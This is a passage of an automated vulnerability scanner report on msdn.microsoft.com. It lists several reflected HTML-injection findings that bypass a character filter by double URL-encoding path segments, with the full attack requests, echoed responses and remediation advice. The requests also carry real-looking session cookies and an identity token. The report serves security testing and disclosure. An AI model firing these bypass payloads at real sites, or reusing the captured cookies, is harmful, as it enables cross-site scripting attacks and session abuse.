<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us2d5fa"><a>e12a11fc95d/library/ff361664" />
...[SNIP]...

2.100. http://msdn.microsoft.com/en-us/library/ff361664.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ff361664.aspx

Issue detail

The value of REST URL parameter 2 (the second path segment, library) is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks: the request is redirected to the site's error page, which writes the requested path into the aspxerrorpath portion of the hidden fromPage input's value attribute. The payload 5de6e%2522%253e%253ca%253ee545caa6f17 was submitted appended to REST URL parameter 2. This input was echoed as 5de6e"><a>e545caa6f17 in the application's response, closing the attribute and the input tag and injecting a new <a> tag.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful, so the High severity rests on confirmed tag injection rather than demonstrated script execution. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks, but it evidently URL-decodes the path a second time after the web server has already decoded it once, so the filter only ever sees the single-decoded %22, %3e and %3c. This can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character (the payload above uses %2522, %253e and %253c for ", > and <).

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode; removing the extra decode closes the double-encoding bypass. Independently of that, the path must be HTML-attribute-encoded (at minimum ", <, > and &) at the point where it is written into the fromPage value attribute, so that no decoded input can terminate the attribute. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library5de6e%2522%253e%253ca%253ee545caa6f17/ff361664.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library5de6e"><a>e545caa6f17/ff361664" />
...[SNIP]...

2.101. http://msdn.microsoft.com/en-us/library/ff361664.aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ff361664.aspx

Issue detail

The value of REST URL parameter 3 (the third path segment, ff361664.aspx) is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks: the request is redirected to the site's error page, which writes the requested path into the aspxerrorpath portion of the hidden fromPage input's value attribute. The payload 18998%2522%253e%253ca%253e4dd5a078452 was submitted appended to REST URL parameter 3. This input was echoed as 18998"><a>4dd5a078452 in the application's response, closing the attribute and the input tag and injecting a new <a> tag.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful, so the High severity rests on confirmed tag injection rather than demonstrated script execution. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks, but it evidently URL-decodes the path a second time after the web server has already decoded it once, so the filter only ever sees the single-decoded %22, %3e and %3c. This can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character (the payload above uses %2522, %253e and %253c for ", > and <).

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3, as the web server will have already carried out one decode; removing the extra decode closes the double-encoding bypass. Independently of that, the path must be HTML-attribute-encoded (at minimum ", <, > and &) at the point where it is written into the fromPage value attribute, so that no decoded input can terminate the attribute. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/ff361664.aspx18998%2522%253e%253ca%253e4dd5a078452 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ff361664.aspx18998"><a>4dd5a078452" />
...[SNIP]...

2.102. http://msdn.microsoft.com/en-us/library/ff921345.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ff921345.aspx

Issue detail

The value of REST URL parameter 1 (the first path segment, en-us) is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks: the request is redirected to the site's error page, which writes the requested path into the aspxerrorpath portion of the hidden fromPage input's value attribute. The payload 3c821%2522%253e%253ca%253ede13ab68088 was submitted appended to REST URL parameter 1. This input was echoed as 3c821"><a>de13ab68088 in the application's response, closing the attribute and the input tag and injecting a new <a> tag.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful, so the High severity rests on confirmed tag injection rather than demonstrated script execution. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks, but it evidently URL-decodes the path a second time after the web server has already decoded it once, so the filter only ever sees the single-decoded %22, %3e and %3c. This can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character (the payload above uses %2522, %253e and %253c for ", > and <).

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1, as the web server will have already carried out one decode; removing the extra decode closes the double-encoding bypass. Independently of that, the path must be HTML-attribute-encoded (at minimum ", <, > and &) at the point where it is written into the fromPage value attribute, so that no decoded input can terminate the attribute. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us3c821%2522%253e%253ca%253ede13ab68088/library/ff921345.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us3c821"><a>de13ab68088/library/ff921345" />
...[SNIP]...

2.103. http://msdn.microsoft.com/en-us/library/ff921345.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ff921345.aspx

Issue detail

The value of REST URL parameter 2 (the second path segment, library) is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks: the request is redirected to the site's error page, which writes the requested path into the aspxerrorpath portion of the hidden fromPage input's value attribute. The payload c33c4%2522%253e%253ca%253eb63170bd290 was submitted appended to REST URL parameter 2. This input was echoed as c33c4"><a>b63170bd290 in the application's response, closing the attribute and the input tag and injecting a new <a> tag.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful, so the High severity rests on confirmed tag injection rather than demonstrated script execution. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks, but it evidently URL-decodes the path a second time after the web server has already decoded it once, so the filter only ever sees the single-decoded %22, %3e and %3c. This can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character (the payload above uses %2522, %253e and %253c for ", > and <).

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode; removing the extra decode closes the double-encoding bypass. Independently of that, the path must be HTML-attribute-encoded (at minimum ", <, > and &) at the point where it is written into the fromPage value attribute, so that no decoded input can terminate the attribute. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/libraryc33c4%2522%253e%253ca%253eb63170bd290/ff921345.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryc33c4"><a>b63170bd290/ff921345" />
...[SNIP]...

2.104. http://msdn.microsoft.com/en-us/library/ff921345.aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ff921345.aspx

Issue detail

The value of REST URL parameter 3 (the third path segment, ff921345.aspx) is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks: the request is redirected to the site's error page, which writes the requested path into the aspxerrorpath portion of the hidden fromPage input's value attribute. The payload 3fc4f%2522%253e%253ca%253ea5cb942ec49 was submitted appended to REST URL parameter 3. This input was echoed as 3fc4f"><a>a5cb942ec49 in the application's response, closing the attribute and the input tag and injecting a new <a> tag.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful, so the High severity rests on confirmed tag injection rather than demonstrated script execution. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks, but it evidently URL-decodes the path a second time after the web server has already decoded it once, so the filter only ever sees the single-decoded %22, %3e and %3c. This can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character (the payload above uses %2522, %253e and %253c for ", > and <).

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3, as the web server will have already carried out one decode; removing the extra decode closes the double-encoding bypass. Independently of that, the path must be HTML-attribute-encoded (at minimum ", <, > and &) at the point where it is written into the fromPage value attribute, so that no decoded input can terminate the attribute. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/ff921345.aspx3fc4f%2522%253e%253ca%253ea5cb942ec49 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ff921345.aspx3fc4f"><a>a5cb942ec49" />
...[SNIP]...

2.105. http://msdn.microsoft.com/en-us/library/ms123401.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms123401.aspx

Issue detail

The value of REST URL parameter 1 (the first path segment, en-us) is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks: the request is redirected to the site's error page, which writes the requested path into the aspxerrorpath portion of the hidden fromPage input's value attribute. The payload 87f9c%2522%253e%253ca%253e4444cb60aed was submitted appended to REST URL parameter 1. This input was echoed as 87f9c"><a>4444cb60aed in the application's response, closing the attribute and the input tag and injecting a new <a> tag.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful, so the High severity rests on confirmed tag injection rather than demonstrated script execution. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks, but it evidently URL-decodes the path a second time after the web server has already decoded it once, so the filter only ever sees the single-decoded %22, %3e and %3c. This can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character (the payload above uses %2522, %253e and %253c for ", > and <).

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1, as the web server will have already carried out one decode; removing the extra decode closes the double-encoding bypass. Independently of that, the path must be HTML-attribute-encoded (at minimum ", <, > and &) at the point where it is written into the fromPage value attribute, so that no decoded input can terminate the attribute. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us87f9c%2522%253e%253ca%253e4444cb60aed/library/ms123401.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; 